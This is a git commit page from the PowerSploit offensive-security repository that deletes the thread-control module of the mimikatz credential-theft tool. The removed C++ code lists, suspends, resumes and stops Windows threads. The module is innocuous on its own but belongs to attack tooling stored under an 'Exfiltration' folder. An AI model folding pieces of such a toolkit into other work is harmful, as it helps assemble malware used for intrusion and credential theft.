diff options
| author | mattifestation <mattgraeber@gmail.com> | 2014-02-03 17:13:35 -0500 |
|---|---|---|
| committer | mattifestation <mattgraeber@gmail.com> | 2014-02-03 17:13:41 -0500 |
| commit | c5168cdba6a3b2d7dd8d79c8ac9583d3ace6a504 (patch) | |
| tree | 31e4238db4984481442faa780e8921782c5de848 /Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp | |
| parent | d9ca5357e4603222268b1c619da10cc7858153d4 (diff) | |
| download | PowerSploit-c5168cdba6a3b2d7dd8d79c8ac9583d3ace6a504.tar.gz PowerSploit-c5168cdba6a3b2d7dd8d79c8ac9583d3ace6a504.zip | |
Removed mimikatz.
This doesn't need to reside in PowerSploit. Those that are truly
paranoid should validate that the embedded executable in
Invoke-Mimikatz.ps1 is indeed mimikatz.
This was causing AV to flag upon downloading PowerSploit.
Diffstat (limited to 'Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp')
| -rw-r--r-- | Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp | 138 |
1 files changed, 0 insertions, 138 deletions
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp deleted file mode 100644 index 3a8edc0..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp +++ /dev/null @@ -1,138 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_thread.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_thread::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(list, L"list", L"Liste les threads")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(suspend, L"suspend", L"Suspend un thread actif")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(resume, L"resume", L"Reprend un thread suspendu")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(stop, L"stop", L"Arrête un thread")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(quit, L"quit", L"Envoi un message de fermeture à un thread")); - return monVector; -} - -bool mod_mimikatz_thread::list(vector<wstring> * arguments) -{ - vector<THREADENTRY32> * vectorThreads = new vector<THREADENTRY32>(); - - DWORD processId = arguments->empty() ? 0 : _wtoi(arguments->front().c_str()); - - if(mod_thread::getList(vectorThreads, arguments->empty() ? NULL : &processId)) - { - (*outputStream) << L"PID\tTID\tprTh" << endl; - for(vector<THREADENTRY32>::iterator monThread = vectorThreads->begin(); monThread != vectorThreads->end(); monThread++) - (*outputStream) << - setw(5) << setfill(wchar_t(' ')) << monThread->th32OwnerProcessID << L'\t' << - setw(5) << setfill(wchar_t(' ')) << monThread->th32ThreadID << L'\t' << - setw(5) << setfill(wchar_t(' ')) << monThread->tpBasePri << - endl; - } - else - (*outputStream) << L"mod_thread::getList ; " << mod_system::getWinError() << endl; - - delete vectorThreads; - return true; -} - -bool mod_mimikatz_thread::resume(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monArgThread = arguments->begin(); monArgThread != arguments->end(); monArgThread++) - { - DWORD threadId = _wtoi(monArgThread->c_str()); - - if(threadId != 0) - { - (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\treprise "; - - if(mod_thread::resume(threadId)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_thread::resume ; " << mod_system::getWinError(); - } - else - (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - - (*outputStream) << endl; - } - - return true; -} - -bool mod_mimikatz_thread::suspend(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monArgThread = arguments->begin(); monArgThread != arguments->end(); monArgThread++) - { - DWORD threadId = _wtoi(monArgThread->c_str()); - - if(threadId != 0) - { - (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tsuspension "; - - if(mod_thread::suspend(threadId)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_thread::suspend ; " << mod_system::getWinError(); - } - else - (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - - (*outputStream) << endl; - } - - return true; -} - -bool mod_mimikatz_thread::stop(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monArgThread = arguments->begin(); monArgThread != arguments->end(); monArgThread++) - { - DWORD threadId = _wtoi(monArgThread->c_str()); - - if(threadId != 0) - { - (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tarrêt "; - - if(mod_thread::stop(threadId)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_thread::stop ; " << mod_system::getWinError(); - } - else - (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - - (*outputStream) << endl; - } - - return true; -} - - -bool mod_mimikatz_thread::quit(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monArgThread = arguments->begin(); monArgThread != arguments->end(); monArgThread++) - { - DWORD threadId = _wtoi(monArgThread->c_str()); - - if(threadId != 0) - { - (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tmessage fermeture "; - - if(mod_thread::quit(threadId)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_thread::quit ; " << mod_system::getWinError(); - } - else - (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - - (*outputStream) << endl; - } - - return true; -} |